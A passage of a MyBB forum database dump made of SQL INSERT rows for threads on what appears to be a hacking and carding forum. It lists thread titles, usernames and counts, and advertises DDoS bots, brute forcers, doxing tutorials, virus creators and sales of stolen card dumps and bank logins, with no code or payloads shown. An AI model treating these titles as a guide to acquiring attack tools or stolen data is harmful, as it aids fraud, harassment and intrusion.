`deletetime`) VALUES ('39', '17', 'E-Whoring Pics Pack of 11 girls', '0', '0', '0', '1', 't3h jok3r', '1342112687', '99', '1345751702', 'iTzIpod', '82', '16', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('40', '17', '600 pic ewhore pack', '0', '0', '0', '1', 't3h jok3r', '1342112738', '100', '1345936890', 't3h jok3r', '1', '22', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('41', '15', 'Virus O Matic.. Virus Creator', '0', '0', '0', '4', 'Triple H', '1342113990', '103', '1345908751', 'BurnsH4X', '48', '32', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('42', '12', '[tut]Hacking 4shared accounts access premium user files', '0', '0', '0', '4', 'Triple H', '1342114102', '104', '1342393326', 'Apathy', '2', '15', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('43', '7', 'How did you find us?', '0', '0', '0', '1', 't3h jok3r', '1342114322', '105', '1350551223', 'R?????zo?', '62', '133', '29', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('44', '8', 'Don\'t Wake Me Up', '0', '0', '0', '13', 'unixmoon', '1342146175', '107', '1342191756', 'Timmy', '5', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('45', '49', 'Varied Sections', '0', '0', '0', '11', 'Reminiscing ?', '1342191908', '111', '1342266617', 't3h jok3r', '1', '20', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('46', '19', '[Junk]++++Best Approval of Dumps with Good Vallid Rate++++', '0', '0', '0', '6', 'xlesnyx12', '1342262132', '118', '1342265729', 't3h jok3r', '1', '5', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('47', '19', '[Junk][Junk]++++Best Approval of Dumps with Good Vallid Rate++++', '0', '0', '0', '6', 'xlesnyx12', '1342262231', '119', '1342266080', 't3h jok3r', '1', '4', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('48', '21', '[Strong] Anonymous DoSer _z0r0_in C #', '0', '0', '0', '8', 'spacefish36', '1342303751', '125', '1352221355', 'Jacob', '160', '67', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('49', '21', 'Pandora DDOS Bot [Direct Link]', '0', '0', '0', '8', 'spacefish36', '1342304133', '126', '1345180204', 'NXK', '61', '40', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('50', '12', '[tut]How to DOX', '0', '0', '0', '1', 't3h jok3r', '1342395175', '132', '1350558532', 'VirtualLegend', '228', '59', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('51', '11', 'DON\'T USE GOOGLE!!!', '0', '0', '0', '1', 't3h jok3r', '1342395331', '133', '1350119804', 'XxTREYZxX', '257', '75', '12', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('52', '9', '?? Adsense Secrets - What Google Never Told ?? [New Release] [Huge Profits]', '0', '0', '0', '4', 'Triple H', '1342395879', '134', '1344964677', 'spacefish36', '8', '10', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('53', '19', '[Junk]Adding Beauty by Painting', '0', '0', '0', '18', 'MartyFogerlie', '1342429044', '136', '1342468645', 't3h jok3r', '1', '6', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('54', '16', '[tut]How to SE McDonald', '0', '0', '0', '9', 'p420', '1342469413', '138', '1346814659', '??????Z', '112', '12', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('55', '12', '[tut] SMS Bomber', '0', '0', '0', '9', 'p420', '1342469677', '139', '1344197810', 'p420', '9', '13', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('56', '15', 'Tubeonia [ Best Youtube Bot ]', '0', '0', '0', '5', 'Timmy', '1342470071', '140', '1347742784', 'iTzIpod', '82', '23', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('57', '18', 'Hackyer\'s Email Bomber V1.0', '0', '0', '0', '12', 'jonas83', '1342471305', '141', '1345681211', 'Romdu62', '7', '34', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('58', '42', 'Miley Cyrus gets swatted', '0', '0', '0', '1', 't3h jok3r', '1343945931', '144', '1343945931', 't3h jok3r', '1', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('59', '42', '13 year old visits jail for hacking', '0', '0', '0', '1', 't3h jok3r', '1343946002', '145', '1345641562', 't3h jok3r', '1', '25', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('60', '25', '[guide] Basic Computer Security', '0', '0', '0', '1', 't3h jok3r', '1343946768', '146', '1345141325', 'sirchamp', '53', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('61', '23', '[Tutorial] Prevention of Infection', '0', '0', '0', '8', 'spacefish36', '1343947441', '147', '1343948116', 'Timmy', '5', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('62', '25', '[Guide]Firewalls', '0', '0', '0', '8', 'spacefish36', '1343947517', '148', '1344199034', 't3h jok3r', '1', '5', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('63', '23', '[Guide] - Keylogger Information & Removal - [Guide]', '0', '0', '0', '12', 'jonas83', '1343948019', '149', '1349501175', 'mothered', '205', '10', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('64', '23', 'Securing your website', '0', '0', '0', '5', 'Timmy', '1343948298', '151', '1347684399', 'Romdu62', '7', '11', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('65', '41', 'Auction Thread Guidelines', '0', '0', '0', '1', 't3h jok3r', '1343951507', '156', '1345506120', 'p420', '9', '9', '1', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('66', '63', 'Read this thread before you make a Request!', '0', '0', '0', '4', 'Triple H', '1343951621', '157', '1347227235', 'iTzIpod', '82', '28', '2', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('67', '19', '[Junk]Selling Good EU,US,UK DUMPS,BANK LOGINS,CC,WU AND BANK TRFS..GOOD DEAL', '0', '4', '0', '6', 'xlesnyx12', '1343987223', '160', '1344003201', 't3h jok3r', '1', '4', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('68', '19', '[Junk]Selling Good EU,US,UK DUMPS,BANK LOGINS,CC,WU AND BANK TRFS..GOOD DEAL', '0', '4', '0', '6', 'xlesnyx12', '1343987480', '161', '1344003305', 't3h jok3r', '1', '10', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('69', '19', '[Junk]Selling Good EU,US,UK DUMPS,BANK LOGINS,CC,WU AND BANK TRFS..GOOD DEAL', '0', '4', '0', '6', 'xlesnyx12', '1343987819', '162', '1344003241', 't3h jok3r', '1', '4', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('70', '19', '[Junk]Selling Good EU,US,UK DUMPS,BANK LOGINS,CC,WU AND BANK TRFS..GOOD DEAL', '0', '4', '0', '6', 'xlesnyx12', '1343987972', '163', '1344003257', 't3h jok3r', '1', '2', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('74', '12', '? FREE DRINKS OUT OF VENDING MACHINES | CODE REVEALED | FREE ?', '0', '0', '0', '5', 'Timmy', '1344114849', '175', '1345864578', 'KFallen', '101', '63', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('73', '12', '|TUT| How to get any Website Login Passwords with uses SSL Encryption', '0', '0', '0', '1', 't3h jok3r', '1344114388', '174', '1344955695', 'sana khan', '50', '18', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('75', '13', '~[TUT]~ How to get someone\'s IP ~[TUT]~', '0', '0', '0', '8', 'spacefish36', '1344198200', '181', '1351613885', 'CommandoModz', '306', '39', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('76', '14', 'Hide-IP-Browser', '0', '0', '0', '12', 'jonas83', '1344198709', '183', '1344198709', 'jonas83', '12', '10', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('77', '16', 'Disguise your voice over Skype', '0', '0', '0', '12', 'jonas83', '1344198838', '184', '1349490083', 'Exposé', '222', '22', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('78', '7', 'Dota 2 beta keys giveawat!', '0', '0', '0', '27', 'Hil', '1344282662', '187', '1345852758', 'NXK', '61', '19', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('79', '29', '[tut]How to ruin somones life[DOX]', '0', '0', '0', '1', 't3h jok3r', '1344287048', '189', '1351979798', 'XxTREYZxX', '257', '55', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('80', '24', 'How WiFi Security Works', '0', '0', '0', '1', 't3h jok3r', '1344287527', '190', '1350132790', 'XxTREYZxX', '257', '11', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('81', '12', '[tut]How to spread your server', '0', '0', '0', '4', 'Triple H', '1344287709', '191', '1345750602', 'iTzIpod', '82', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('82', '13', '[guide]How to detect Hash Type', '0', '0', '0', '17', 'khade009', '1344287942', '193', '1344456396', 'Romdu62', '7', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('83', '34', '[tut]How to make a thread design', '0', '0', '0', '9', 'p420', '1344288236', '196', '1345557952', 'iTzIpod', '82', '17', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('84', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '0', '0', '6', 'xlesnyx12', '1344312979', '199', '1344356245', 'JakeUS', '20', '4', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('85', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '0', '0', '6', 'xlesnyx12', '1344313194', '200', '1344356262', 'JakeUS', '20', '6', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('86', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '0', '0', '6', 'xlesnyx12', '1344313620', '201', '1344356274', 'JakeUS', '20', '3', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('87', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '0', '0', '6', 'xlesnyx12', '1344313725', '202', '1344356288', 'JakeUS', '20', '4', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('88', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '0', '0', '6', 'xlesnyx12', '1344313895', '203', '1344356299', 'JakeUS', '20', '3', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('89', '19', '[Junk]Track1&2 Fullz and Atm Skimmer.', '0', '0', '0', '6', 'xlesnyx12', '1344313990', '204', '1344356309', 'JakeUS', '20', '7', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('90', '24', '[tut]How to really hide your data from the cops', '0', '0', '0', '1', 't3h jok3r', '1344372996', '215', '1345065077', 't3h jok3r', '1', '8', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('91', '42', 'Gold-medal swimmer admits to cheating in 100 breaststroke', '0', '0', '0', '1', 't3h jok3r', '1344452361', '219', '1345555125', 'iTzIpod', '82', '16', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('92', '15', '[FREE Leaked Download] RhinoTube || #1 Free Youtube bot||', '0', '0', '0', '9', 'p420', '1344454979', '220', '1347742927', 'iTzIpod', '82', '38', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('93', '18', 'Gmail Brute Forcer Tool', '0', '0', '0', '9', 'p420', '1344455840', '221', '1344898404', 'Triple H', '4', '16', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('94', '16', 'What is this section about?', '0', '0', '0', '9', 'p420', '1344456185', '223', '1346503673', 'Jacob', '160', '36', '5', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('95', '13', 'XSS Cheat Sheet', '0', '0', '0', '7', 'Romdu62', '1344456827', '225', '1347493741', 'iTzIpod', '82', '21', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, 